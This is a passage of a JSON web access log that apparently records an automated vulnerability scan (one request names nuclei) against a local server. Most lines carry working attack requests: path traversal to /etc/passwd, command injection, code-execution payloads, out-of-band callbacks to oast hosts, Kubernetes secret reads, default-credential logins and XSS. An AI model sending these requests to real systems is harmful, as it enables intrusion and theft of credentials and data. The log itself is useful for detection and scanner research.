Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/system.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test/snapshot-backdata\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.005","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v2/graphiql.min.css HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-browser/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms7.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"username=jovyan&password=jupyter","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hub/login?next= HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?login=lutron&password=lutron HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/vpn.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manage/log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/ck/domenu.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms8.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"_=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passwordrecovered.cgi?id=nuclei HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget HTTP/1.1","status":"499","body_bytes_sents":"0","req_time":"4.999","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/view?filename=/etc/passwd&base=../../../../../../../../../../ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=C://&suffix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.186","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms85.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/warn.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /main/calendar/agenda_list.php?type=xss\x22+onmouseover=alert(document.domain)+\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.187","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login?redirect=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.190","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslvpn/Login/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adm/krgourl.php?DOCUMENT_ROOT=http://c9v8hs0smpv8c6ag07h0wrftdhd4gdzoa.oast.online HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.200","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /testrail/files.md5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__clockwork/latest HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iNotes/Forms9.nsf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /appmonitor/protected/selector/server_file/files?folder=/&suffix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hystrix/;a=a/__$%7BT%20%28java.lang.Runtime%29.getRuntime%28%29.exec%28%22nslookup%20c9v8hn0smpv8c57g0t00m1tktxjqju3k5.oast.live%22%29%7D__::.x/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/docs/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /EemAdminService/EemAdmin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.069","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json?FNZ.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.208","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configure/app/landing/welcome-srm-va.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?s=captcha HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.202","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /qvisdvr/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"bsh.script=exec(\x22ipconfig\x22);","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.177","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /host-manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc.children.json/FNZ.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /assets/_core/php/profile.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.042","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:19 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/componentutils/login.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) 